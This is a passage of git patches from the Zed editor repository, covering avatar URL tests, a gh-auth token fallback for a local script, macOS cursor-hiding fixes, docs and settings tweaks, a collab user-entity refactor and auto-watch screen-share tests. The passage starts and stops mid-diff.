+ { + return Ok(Some(avatar_url)); } let commit = commit.to_string(); @@ -629,4 +644,26 @@ mod tests { "https://avatars.githubusercontent.com/u/e?email=user%2Btag%40example.com&s=128" ); } + + #[test] + fn test_build_cdn_avatar_url_for_author_email_skips_bot_noreply_emails() { + for email in [ + "41898282+github-actions[bot]@users.noreply.github.com", + "<41898282+github-actions[bot]@users.noreply.github.com>", + ] { + assert_eq!(build_cdn_avatar_url_for_author_email(email).unwrap(), None); + } + } + + #[test] + fn test_build_cdn_avatar_url_for_author_email_uses_user_noreply_emails() { + let url = build_cdn_avatar_url_for_author_email("12345+octocat@users.noreply.github.com") + .unwrap() + .unwrap(); + + assert_eq!( + url.as_str(), + "https://avatars.githubusercontent.com/u/e?email=12345%2Boctocat%40users.noreply.github.com&s=128" + ); + } } From 95ae6cc19bac45e2b5c888032bafa71f4256cb50 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Thu, 30 Apr 2026 10:19:13 -0400 Subject: [PATCH 123/231] Add gh auth token fallback to top ranking issues script (#55028) This just allows me to switch from using tokens to `gh` when running this script locally. Release Notes: - N/A --- script/update_top_ranking_issues/main.py | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/script/update_top_ranking_issues/main.py b/script/update_top_ranking_issues/main.py index 0b71d0bb86425b..717f1394300d96 100644 --- a/script/update_top_ranking_issues/main.py +++ b/script/update_top_ranking_issues/main.py @@ -1,4 +1,5 @@ import os +import subprocess from datetime import date, datetime, timedelta from typing import Any, Optional @@ -39,9 +40,15 @@ def main( # but we can place it in our env when running the script locally, for convenience token = github_token or os.getenv("GITHUB_ACCESS_TOKEN") if not token: - raise typer.BadParameter( - "GitHub token is required. Pass --github-token or set GITHUB_ACCESS_TOKEN env var." 
- ) + try: + result = subprocess.run( + ["gh", "auth", "token"], capture_output=True, text=True, check=True + ) + token = result.stdout.strip() + except (subprocess.CalledProcessError, FileNotFoundError): + raise typer.BadParameter( + "GitHub token is required. Pass --github-token, set GITHUB_ACCESS_TOKEN env var, or log in with `gh auth login`." + ) headers = { "Authorization": f"token {token}", From 93fb4665a97118b2a9d2025184a7e11081645878 Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Thu, 30 Apr 2026 16:19:27 +0200 Subject: [PATCH 124/231] Fix cursor style changes across windows (#55323) We were storing a cursor hidden boolean in the window state, but that state is actually global to the application. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/gpui_macos/src/platform.rs | 23 +++++++++--- crates/gpui_macos/src/window.rs | 62 ++++++++++++++++++++++++------- 2 files changed, 66 insertions(+), 19 deletions(-) diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index fa37597065fb17..fefe957bb25bad 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -52,7 +52,7 @@ use std::{ ptr, rc::Rc, slice, str, - sync::{Arc, OnceLock}, + sync::{Arc, OnceLock, atomic::AtomicBool}, }; use util::{ ResultExt, @@ -179,6 +179,7 @@ pub(crate) struct MacPlatformState { dock_menu: Option, menus: Option>, keyboard_mapper: Rc, + cursor_hidden: Arc, } impl MacPlatform { @@ -215,6 +216,7 @@ impl MacPlatform { on_thermal_state_change: None, menus: None, keyboard_mapper, + cursor_hidden: Arc::new(AtomicBool::new(false)), })) } @@ -619,12 +621,22 @@ 
impl Platform for MacPlatform { handle: AnyWindowHandle, options: WindowParams, ) -> Result> { - let renderer_context = self.0.lock().renderer_context.clone(); + let (cursor_hidden, foreground_executor, background_executor, renderer_context) = { + let guard = self.0.lock(); + ( + guard.cursor_hidden.clone(), + guard.foreground_executor.clone(), + guard.background_executor.clone(), + guard.renderer_context.clone(), + ) + }; + Ok(Box::new(MacWindow::open( handle, options, - self.foreground_executor(), - self.background_executor(), + cursor_hidden, + foreground_executor, + background_executor, renderer_context, ))) } @@ -979,8 +991,9 @@ impl Platform for MacPlatform { /// Match cursor style to one of the styles available /// in macOS's [NSCursor](https://developer.apple.com/documentation/appkit/nscursor). fn set_cursor_style(&self, style: CursorStyle) { + let cursor_hidden = self.0.lock().cursor_hidden.clone(); unsafe { - set_active_window_cursor_style(style); + set_active_window_cursor_style(style, &cursor_hidden); } } diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index c4c47c4f542468..2ab4b52d8d8ace 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -324,17 +324,34 @@ pub(crate) fn convert_mouse_position(position: NSPoint, window_height: Pixels) - /// This function is not thread safe. Callers must ensure this is called on the AppKit main /// thread because it reads the active AppKit window and updates GPUI window state associated /// with Objective-C objects. -pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { +pub(crate) unsafe fn set_active_window_cursor_style( + style: CursorStyle, + cursor_hidden: &AtomicBool, +) { // SAFETY: The caller guarantees AppKit main-thread access. The class check ensures the // window has our WINDOW_STATE_IVAR before reading it. 
unsafe { let app = NSApplication::sharedApplication(nil); + let key_window: id = msg_send![app, keyWindow]; let main_window: id = msg_send![app, mainWindow]; - if main_window.is_null() || !msg_send![main_window, isKindOfClass: WINDOW_CLASS] { + let active_window = if !key_window.is_null() + && msg_send![key_window, isKindOfClass: WINDOW_CLASS] + { + Some(key_window) + } else if !main_window.is_null() && msg_send![main_window, isKindOfClass: WINDOW_CLASS] { + Some(main_window) + } else { + None + }; + + let Some(active_window) = active_window else { + if !matches!(style, CursorStyle::None) { + unhide_cursor(cursor_hidden); + } return; - } + }; - let window_state = get_window_state(&*main_window); + let window_state = get_window_state(&*active_window); let mut window_state = window_state.lock(); if window_state.cursor_style != style { window_state.cursor_style = style; @@ -346,6 +363,22 @@ pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { } } +/// Unhides the cursor if this GPUI platform instance has hidden it. +/// +/// # Safety +/// +/// Must be called on the AppKit main thread. +unsafe fn unhide_cursor(cursor_hidden: &AtomicBool) { + unsafe { + if cursor_hidden + .compare_exchange(true, false, Ordering::Relaxed, Ordering::Relaxed) + .is_ok() + { + let _: () = msg_send![class!(NSCursor), unhide]; + } + } +} + unsafe fn build_window_class(name: &'static str, superclass: &Class) -> *const Class { unsafe { let mut decl = ClassDecl::new(name, superclass).unwrap(); @@ -463,7 +496,7 @@ struct MacWindowState { blurred_view: Option, background_appearance: WindowBackgroundAppearance, cursor_style: CursorStyle, - cursor_hidden: bool, + cursor_hidden: Arc, display_link: Option, renderer: renderer::Renderer, request_frame_callback: Option>, @@ -665,6 +698,7 @@ impl MacWindow { tabbing_identifier, .. 
}: WindowParams, + cursor_hidden: Arc, foreground_executor: ForegroundExecutor, background_executor: BackgroundExecutor, renderer_context: renderer::Context, @@ -782,7 +816,7 @@ impl MacWindow { blurred_view: None, background_appearance: WindowBackgroundAppearance::Opaque, cursor_style: CursorStyle::Arrow, - cursor_hidden: false, + cursor_hidden, display_link: None, renderer: renderer::new_renderer( renderer_context, @@ -1820,18 +1854,21 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { let cursor_hidden; { - let mut window_state = window_state.lock(); + let window_state = window_state.lock(); if matches!(window_state.cursor_style, CursorStyle::None) { - if !window_state.cursor_hidden { + if window_state + .cursor_hidden + .compare_exchange(false, true, Ordering::Relaxed, Ordering::Relaxed) + .is_ok() + { let _: () = msg_send![class!(NSCursor), hide]; - window_state.cursor_hidden = true; } return; } cursor_style = window_state.cursor_style; - cursor_hidden = window_state.cursor_hidden; + cursor_hidden = window_state.cursor_hidden.clone(); }; let cursor: id = match cursor_style { @@ -1871,10 +1908,7 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { CursorStyle::None => unreachable!(), }; - if cursor_hidden { - let _: () = msg_send![class!(NSCursor), unhide]; - window_state.lock().cursor_hidden = false; - } + unhide_cursor(&cursor_hidden); let bounds = NSView::bounds(this as *const Object as id); let _: () = msg_send![this, addCursorRect: bounds cursor: cursor]; From ad86df6cf3a2e298c20d210cc9f713f6e48de603 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mar=C3=ADa=20Craig?= Date: Thu, 30 Apr 2026 16:58:11 +0200 Subject: [PATCH 125/231] docs: Clarify search_web tool availability for Zed Pro (#55329) Adds a note to the `search_web` tool entry in the AI tools docs clarifying that the built-in tool is only available to Zed Pro subscribers, and pointing free-plan users to MCP servers as an alternative. 
Release Notes: - N/A --- docs/src/ai/tools.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/docs/src/ai/tools.md b/docs/src/ai/tools.md index 3ada0ce025976a..627a905899006a 100644 --- a/docs/src/ai/tools.md +++ b/docs/src/ai/tools.md @@ -63,6 +63,8 @@ Searches the web for information, providing results with snippets and links from **Example:** Looking up whether a known bug in a dependency has been patched in a recent release, or finding the current API signature for a third-party library when the local docs are out of date. +> **Note:** The built-in `search_web` tool is only available to [Zed Pro](https://zed.dev/pricing) subscribers using the Zed provider. If you're on a free plan or using a different provider, you can get equivalent functionality by connecting an MCP server that provides web search capabilities. See [MCP servers](./mcp.md) for details. + ## Edit Tools ### `copy_path` From aecadc743844503894b37bb68de9efabd3e5d4e3 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Thu, 30 Apr 2026 13:11:06 -0300 Subject: [PATCH 126/231] title_bar: Display subfolders in the project button (#54796) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow up to https://github.com/zed-industries/zed/pull/54406. Closes https://github.com/zed-industries/zed/issues/54782. In the PR linked above, we made the label that's displayed in the project button be always the repository name. However, if you're opening up a subfolder of that repository as the main-root of a given project/workspace, we wouldn't display that anymore. This PR fixes that by _still_ displaying the repo name, but the subfolder, too, in the titlebar: Screenshot 2026-04-24 at 4  52@2x Release Notes: - Fixed a bug where we don't display subfolders of a repository in the title bar's project button. 
--- crates/title_bar/src/title_bar.rs | 21 ++++++++++++++++++--- 1 file changed, 18 insertions(+), 3 deletions(-) diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index 02a0c1bcf78129..c6f82adcdf01d1 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -190,8 +190,9 @@ impl Render for TitleBar { let mut linked_worktree_name = None; if let Some(worktree) = self.effective_active_worktree(cx) { repository = self.get_repository_for_worktree(&worktree, cx); - let worktree = worktree.read(cx); + let worktree_abs_path = worktree.read(cx).abs_path(); project_name = worktree + .read(cx) .root_name() .file_name() .map(|name| SharedString::from(name.to_string())); @@ -210,14 +211,28 @@ impl Render for TitleBar { .then_some(project_name.clone()) .flatten() }); + let identity = repo_identity_path(&repo.common_dir_abs_path); + let display_name = if identity.extension() == Some(std::ffi::OsStr::new("git")) { identity.file_stem() } else { identity.file_name() }; - if let Some(name) = display_name.and_then(|n| n.to_str()) { - project_name = Some(name.into()); + + if let Some(repo_name) = display_name.and_then(|n| n.to_str()) { + let name = if let Ok(relative) = + worktree_abs_path.strip_prefix(&*repo.work_directory_abs_path) + { + if relative.as_os_str().is_empty() { + repo_name.to_string() + } else { + format!("{}/{}", repo_name, relative.display()) + } + } else { + repo_name.to_string() + }; + project_name = Some(SharedString::from(name)); } } } From 48f90b3c1392553ce57254b689cd8a84bbe5999e Mon Sep 17 00:00:00 2001 From: Candido Sales Gomes Date: Fri, 1 May 2026 05:19:19 -0400 Subject: [PATCH 127/231] Disable fuzzy-ruby-server by default in Ruby language servers (#55215) ## Summary Add `!fuzzy-ruby-server` to the Ruby language servers list in the default settings so it is opt-in rather than enabled for all users by default. 
This is a prerequisite for merging the Fuzzy Ruby Server support in the Ruby extension: https://github.com/zed-extensions/ruby/pull/283 As requested by @vitallium in the review comment: https://github.com/zed-extensions/ruby/pull/283\#issuecomment-4294888519 ## Change ```diff - "language_servers": ["solargraph", "!ruby-lsp", "!rubocop", "!sorbet", "!steep", "!kanayago", "..."], + "language_servers": ["solargraph", "!ruby-lsp", "!rubocop", "!sorbet", "!steep", "!kanayago", "!fuzzy-ruby-server", "..."], ``` Release Notes: - Disabled `fuzzy-ruby-server` by default for Ruby files. --------- Co-authored-by: Marshall Bowers --- assets/settings/default.json | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index c0ec7b74f5abbf..d2bec7226627e2 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -2255,7 +2255,16 @@ "language_servers": ["basedpyright", "ruff", "!ty", "!pyrefly", "!pyright", "!pylsp", "..."], }, "Ruby": { - "language_servers": ["solargraph", "!ruby-lsp", "!rubocop", "!sorbet", "!steep", "!kanayago", "..."], + "language_servers": [ + "solargraph", + "!ruby-lsp", + "!rubocop", + "!sorbet", + "!steep", + "!kanayago", + "!fuzzy-ruby-server", + "...", + ], }, "Rust": { "debuggers": ["CodeLLDB"], From 7ea9ac8a6a7e7651613fb0ec9819b2ca614b2313 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Fri, 1 May 2026 19:28:57 +0200 Subject: [PATCH 128/231] collab: Decouple session principal from `User` database model (#55440) This PR decouples the session principal in Collab from the `User` database model. We have introduced a new `User` domain entity that we use for the principal. Currently we just construct it from the database model, but this separation will make it easier to remove reliance on reading the database directly soon. 
Release Notes: - N/A --- crates/collab/src/auth.rs | 2 +- crates/collab/src/db.rs | 1 - crates/collab/src/db/queries/users.rs | 19 +++++++++++++------ crates/collab/src/db/tables/user.rs | 11 +++++++++++ crates/collab/src/entities.rs | 3 +++ crates/collab/src/entities/user.rs | 9 +++++++++ crates/collab/src/lib.rs | 1 + crates/collab/src/rpc.rs | 3 ++- .../collab/tests/integration/test_server.rs | 2 +- 9 files changed, 41 insertions(+), 10 deletions(-) create mode 100644 crates/collab/src/entities.rs create mode 100644 crates/collab/src/entities/user.rs diff --git a/crates/collab/src/auth.rs b/crates/collab/src/auth.rs index 5cd377d605b1d5..629d93388dd9d5 100644 --- a/crates/collab/src/auth.rs +++ b/crates/collab/src/auth.rs @@ -74,7 +74,7 @@ pub async fn validate_header(mut req: Request, next: Next) -> impl Into .await? .with_context(|| format!("user {user_id} not found"))?; - req.extensions_mut().insert(Principal::User(user)); + req.extensions_mut().insert(Principal::User(user.into())); return Ok::<_, Error>(next.run(req).await); } diff --git a/crates/collab/src/db.rs b/crates/collab/src/db.rs index b3a943bef44904..10c4f7c961f152 100644 --- a/crates/collab/src/db.rs +++ b/crates/collab/src/db.rs @@ -37,7 +37,6 @@ use worktree_settings_file::LocalSettingsKind; pub use ids::*; pub use sea_orm::ConnectOptions; -pub use tables::user::Model as User; pub use tables::*; #[cfg(feature = "test-support")] diff --git a/crates/collab/src/db/queries/users.rs b/crates/collab/src/db/queries/users.rs index 96771ecba541b4..ceb23d535e9d42 100644 --- a/crates/collab/src/db/queries/users.rs +++ b/crates/collab/src/db/queries/users.rs @@ -60,7 +60,10 @@ impl Database { } /// Returns a user by GitHub login. There are no access checks here, so this should only be used internally. 
- pub async fn get_user_by_github_login(&self, github_login: &str) -> Result> { + pub async fn get_user_by_github_login( + &self, + github_login: &str, + ) -> Result> { self.transaction(|tx| async move { Ok(user::Entity::find() .filter(user::Column::GithubLogin.eq(github_login)) @@ -78,7 +81,7 @@ impl Database { github_name: Option<&str>, github_user_created_at: DateTimeUtc, initial_channel_id: Option, - ) -> Result { + ) -> Result { self.transaction(|tx| async move { self.update_or_create_user_by_github_account_tx( github_login, @@ -103,7 +106,7 @@ impl Database { github_user_created_at: NaiveDateTime, initial_channel_id: Option, tx: &DatabaseTransaction, - ) -> Result { + ) -> Result { if let Some(existing_user) = self .get_user_by_github_user_id_or_github_login(github_user_id, github_login, tx) .await? @@ -156,7 +159,7 @@ impl Database { github_user_id: i32, github_login: &str, tx: &DatabaseTransaction, - ) -> Result> { + ) -> Result> { if let Some(user_by_github_user_id) = user::Entity::find() .filter(user::Column::GithubUserId.eq(github_user_id)) .one(tx) @@ -178,7 +181,7 @@ impl Database { /// get_all_users returns the next page of users. To get more call again with /// the same limit and the page incremented by 1. - pub async fn get_all_users(&self, page: u32, limit: u32) -> Result> { + pub async fn get_all_users(&self, page: u32, limit: u32) -> Result> { self.transaction(|tx| async move { Ok(user::Entity::find() .order_by_asc(user::Column::GithubLogin) @@ -207,7 +210,11 @@ impl Database { } /// Find users where github_login ILIKE name_query. 
- pub async fn fuzzy_search_users(&self, name_query: &str, limit: u32) -> Result> { + pub async fn fuzzy_search_users( + &self, + name_query: &str, + limit: u32, + ) -> Result> { self.transaction(|tx| async { let tx = tx; let like_string = Self::fuzzy_like_string(name_query); diff --git a/crates/collab/src/db/tables/user.rs b/crates/collab/src/db/tables/user.rs index 97b96661d7b5a7..68044bc4429937 100644 --- a/crates/collab/src/db/tables/user.rs +++ b/crates/collab/src/db/tables/user.rs @@ -19,6 +19,17 @@ pub struct Model { pub created_at: NaiveDateTime, } +impl From for crate::entities::User { + fn from(user: Model) -> Self { + crate::entities::User { + id: user.id, + github_login: user.github_login, + admin: user.admin, + connected_once: user.connected_once, + } + } +} + #[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)] pub enum Relation { #[sea_orm(has_one = "super::room_participant::Entity")] diff --git a/crates/collab/src/entities.rs b/crates/collab/src/entities.rs new file mode 100644 index 00000000000000..2478900d79130f --- /dev/null +++ b/crates/collab/src/entities.rs @@ -0,0 +1,3 @@ +mod user; + +pub use user::*; diff --git a/crates/collab/src/entities/user.rs b/crates/collab/src/entities/user.rs new file mode 100644 index 00000000000000..0c31d78ac51002 --- /dev/null +++ b/crates/collab/src/entities/user.rs @@ -0,0 +1,9 @@ +use crate::db::UserId; + +#[derive(Debug, Clone)] +pub struct User { + pub id: UserId, + pub github_login: String, + pub admin: bool, + pub connected_once: bool, +} diff --git a/crates/collab/src/lib.rs b/crates/collab/src/lib.rs index 7af4216ca5ee69..51541242a4474d 100644 --- a/crates/collab/src/lib.rs +++ b/crates/collab/src/lib.rs @@ -1,6 +1,7 @@ pub mod api; pub mod auth; pub mod db; +pub mod entities; pub mod env; pub mod executor; pub mod rpc; diff --git a/crates/collab/src/rpc.rs b/crates/collab/src/rpc.rs index 2fbbda032cc7ab..4c38887b5412dd 100644 --- a/crates/collab/src/rpc.rs +++ b/crates/collab/src/rpc.rs @@ -1,12 
+1,13 @@ mod connection_pool; use crate::api::{CloudflareIpCountryHeader, SystemIdHeader}; +use crate::entities::User; use crate::{ AppState, Error, Result, auth, db::{ self, BufferId, Capability, Channel, ChannelId, ChannelRole, ChannelsForUser, Database, InviteMemberResult, MembershipUpdated, NotificationId, ProjectId, RejoinedProject, - RemoveChannelMemberResult, RespondToChannelInvite, RoomId, ServerId, SharedThreadId, User, + RemoveChannelMemberResult, RespondToChannelInvite, RoomId, ServerId, SharedThreadId, UserId, }, executor::Executor, diff --git a/crates/collab/tests/integration/test_server.rs b/crates/collab/tests/integration/test_server.rs index 33bc373d058019..32f0e29c6dc8ed 100644 --- a/crates/collab/tests/integration/test_server.rs +++ b/crates/collab/tests/integration/test_server.rs @@ -294,7 +294,7 @@ impl TestServer { cx.background_spawn(server.handle_connection( server_conn, client_name, - Principal::User(user), + Principal::User(user.into()), ZedVersion(semver::Version::new(1, 0, 0)), Some("test".to_string()), None, From a65329d8cf3c18f35a6ba8f524618007034d0582 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Fri, 1 May 2026 13:29:27 -0400 Subject: [PATCH 129/231] Add ability to auto watch screens (#54839) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR adds a feature to automatically cycle through screen shares during calls, designed for demo days or any call that has a lot of screen share use. This is a preliminary attempt behind a feature flag so we can dogfood and iterate, or toss it out. There's a new toggle next to the active channel name in the collab panel: **Auto Watch Screens**. 
https://github.com/user-attachments/assets/ae6eccec-7921-4c1f-8921-c8093631c705 This video demonstrates some cases: Basic auto-watch - Toggle on → automatically opens the next screen share that starts - When the watched screen share ends, switches to the next available share Queuing - Someone starts sharing while another share is active → doesn't interrupt the current share - When the current share ends, the queued share is picked up automatically Paused while sharing - Auto-watch pauses when you start sharing your own screen, so other shares don't pop up during your presentation - When you stop sharing, auto-watch resumes and opens the next available share Multiple watchers - Multiple people can have auto-watch enabled independently — they all see the same transitions Note that we don't manage the screen shares, LiveKit does, so this change is entirely on the client. I think that's mostly fine, but there is a chance that two separate clients queue up a different person as the next watched peer if they both engage screen share around the same time, depending on how it hits the clients, but it seems like a rare edge case. We could move the implementation to collab, but it would be more of a project, and it would add a secondary source alongside LiveKit that could get out of sync and develop its own issues.
UI/UX needs work (@danilo-leal for suggestions) Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --------- Co-authored-by: Yara 🏳️‍⚧️ <11743287+yara-blue@users.noreply.github.com> --- Cargo.lock | 1 + crates/call/src/call_impl/mod.rs | 25 ++ crates/call/src/call_impl/room.rs | 4 + .../tests/integration/auto_watch_tests.rs | 272 ++++++++++++++++++ .../collab/tests/integration/collab_tests.rs | 1 + crates/collab_ui/Cargo.toml | 1 + crates/collab_ui/src/collab_panel.rs | 83 +++++- crates/feature_flags/src/flags.rs | 8 + crates/livekit_client/src/test.rs | 75 ++++- crates/workspace/src/workspace.rs | 122 +++++++- 10 files changed, 579 insertions(+), 13 deletions(-) create mode 100644 crates/collab/tests/integration/auto_watch_tests.rs diff --git a/Cargo.lock b/Cargo.lock index 68392df3b7ada0..bd5f9f19a5517b 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3279,6 +3279,7 @@ dependencies = [ "collections", "db", "editor", + "feature_flags", "futures 0.3.32", "fuzzy", "gpui", diff --git a/crates/call/src/call_impl/mod.rs b/crates/call/src/call_impl/mod.rs index 39cb4cd9e3cb90..c0c1535cd45684 100644 --- a/crates/call/src/call_impl/mod.rs +++ b/crates/call/src/call_impl/mod.rs @@ -112,6 +112,13 @@ impl AnyActiveCall for ActiveCallEntity { .map_or(false, |room| room.read(cx).is_sharing_project()) } + fn is_sharing_screen(&self, cx: &App) -> bool { + self.0 + .read(cx) + .room() + .map_or(false, |room| room.read(cx).is_sharing_screen()) + } + fn has_remote_participants(&self, cx: &App) -> bool { self.0.read(cx).room().map_or(false, |room| { !room.read(cx).remote_participants().is_empty() @@ -209,6 +216,12 @@ 
impl AnyActiveCall for ActiveCallEntity { participant_id: *participant_id, }) } + room::Event::LocalScreenShareStarted => { + Some(ActiveCallEvent::LocalScreenShareStarted) + } + room::Event::LocalScreenShareStopped => { + Some(ActiveCallEvent::LocalScreenShareStopped) + } _ => None, }; if let Some(event) = mapped { @@ -297,6 +310,18 @@ impl AnyActiveCall for ActiveCallEntity { ) })) } + + fn peer_ids_with_video_tracks(&self, cx: &App) -> Vec { + let Some(room) = self.0.read(cx).room() else { + return Vec::new(); + }; + room.read(cx) + .remote_participants() + .values() + .filter(|p| p.has_video_tracks()) + .map(|p| p.peer_id) + .collect() + } } pub struct OneAtATime { diff --git a/crates/call/src/call_impl/room.rs b/crates/call/src/call_impl/room.rs index 37a3fd823ec03d..f9df2b758f7664 100644 --- a/crates/call/src/call_impl/room.rs +++ b/crates/call/src/call_impl/room.rs @@ -66,6 +66,8 @@ pub enum Event { RoomLeft { channel_id: Option, }, + LocalScreenShareStarted, + LocalScreenShareStopped, } pub struct Room { @@ -1513,6 +1515,7 @@ impl Room { track_publication: publication, _stream: stream, }; + cx.emit(Event::LocalScreenShareStarted); cx.notify(); } @@ -1674,6 +1677,7 @@ impl Room { let sid = track_publication.sid(); cx.spawn(async move |_, cx| local_participant.unpublish_track(sid, cx).await) .detach_and_log_err(cx); + cx.emit(Event::LocalScreenShareStopped); cx.notify(); } diff --git a/crates/collab/tests/integration/auto_watch_tests.rs b/crates/collab/tests/integration/auto_watch_tests.rs new file mode 100644 index 00000000000000..c8d395407b362b --- /dev/null +++ b/crates/collab/tests/integration/auto_watch_tests.rs @@ -0,0 +1,272 @@ +use crate::TestServer; +use call::ActiveCall; +use gpui::{App, BackgroundExecutor, Entity, TestAppContext, TestScreenCaptureSource}; +use project::Project; +use serde_json::json; +use util::path; +use workspace::Workspace; + +use super::TestClient; + +struct AutoWatchTestSetup { + client_a: TestClient, + _client_b: TestClient, 
+ _client_c: TestClient, + project_a: Entity, +} + +async fn setup_auto_watch_test( + server: &mut TestServer, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) -> AutoWatchTestSetup { + let client_a = server.create_client(user_a, "user_a").await; + let client_b = server.create_client(user_b, "user_b").await; + let client_c = server.create_client(user_c, "user_c").await; + server + .create_room(&mut [ + (&client_a, user_a), + (&client_b, user_b), + (&client_c, user_c), + ]) + .await; + + let active_call_a = user_a.read(ActiveCall::global); + + client_a + .fs() + .insert_tree(path!("/a"), json!({ "file.txt": "content" })) + .await; + let (project_a, _worktree_id) = client_a.build_local_project(path!("/a"), user_a).await; + active_call_a + .update(user_a, |call, cx| call.set_location(Some(&project_a), cx)) + .await + .unwrap(); + + AutoWatchTestSetup { + client_a, + _client_b: client_b, + _client_c: client_c, + project_a, + } +} + +#[gpui::test] +async fn test_auto_watch_opens_existing_share_on_toggle( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + executor.run_until_parked(); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_opens_share_when_no_one_is_sharing_yet( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + 
let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_switches_to_next_share_on_share_end( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); + + start_screen_share(user_c).await; + executor.run_until_parked(); + + stop_screen_share(user_b); + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_c's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_ignores_shares_while_user_is_sharing( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + start_screen_share(user_a).await; 
+ executor.run_until_parked(); + start_screen_share(user_b).await; + executor.run_until_parked(); + + // Should NOT open B's screen cause we are sharing + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + executor.run_until_parked(); + + // Ensure that no screen share is found in user a's tab bar + workspace_a.update(user_a, |workspace, cx| { + let has_shared_screen_tab = workspace + .active_pane() + .read(cx) + .items() + .any(|item| item.tab_content_text(0, cx).contains("screen")); + assert!( + !has_shared_screen_tab, + "should not open anyone's screen share when toggling on while sharing" + ); + }); +} + +#[gpui::test] +async fn test_auto_watch_opens_share_after_local_user_stops_sharing( + executor: BackgroundExecutor, + user_a: &mut TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + start_screen_share(user_a).await; + executor.run_until_parked(); + + start_screen_share(user_b).await; + executor.run_until_parked(); + + stop_screen_share(user_a); + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[gpui::test] +async fn test_auto_watch_toggle_off_leaves_tabs_open( + executor: BackgroundExecutor, + user_a: &mut 